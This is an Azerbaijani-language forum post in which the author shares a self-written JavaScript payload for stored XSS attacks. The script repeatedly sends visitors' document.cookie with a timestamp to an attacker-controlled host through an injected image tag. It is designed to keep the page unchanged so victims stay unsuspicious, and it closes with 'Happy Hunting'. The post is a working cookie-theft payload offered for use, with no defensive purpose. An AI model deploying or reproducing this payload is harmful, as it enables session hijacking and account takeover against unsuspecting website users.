Salam uşaqlar.Sizə xırda da olsa öz yazmam olan bir script təqdim edirəm.Bu script əsasən persisten(stored) xss atacklarda istifadə edilə bilər.
Bəzən saytlara javascript kodu inject edəndə location replace avtomatik olaraq cookieni yollayır və səhifəni də dəyişdirir.Bu isə victim i şübhələndirir.
Aşağıdakı kodları isə inject edəndə cookie sadəcə sayta girdikdən müəyyən vaxt sonra göndərilir.Ən azından daha az şübhə doğurur(Səhifə sabit qalır).
Kod:
<script type = "text/javascript">
function cookie(){
var cookie = document.cookie;
var time = new Date;
var hours = time.getHours();
var minutes = time.getMinutes();
var seconds = time.getSeconds();
document.write('<img src="http://site_for_accepting_cookies/?cookie='+cookie+':[time]:'+hours+':'+minutes+':'+seconds + '"'+ '/>');
}
setInterval("cookie()",10000);
</script>
Bu qədər.Bu script hərdəfə sayta daxil olanların cookiesini 10 səniyədən bir göndərir sənin hostuna.Sizdə öz yazdığınız hər hansı bir scriptlə query string dəki dəyərləri götürürsünüz.Bu qədər sadə .
Happy Hunting !!!!
Ps bunun ajax versiyasınıda hazırlayıb təqdim edəcəm.O versiya daha əla olacaq.Sadəcə vaxt azlığı
Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..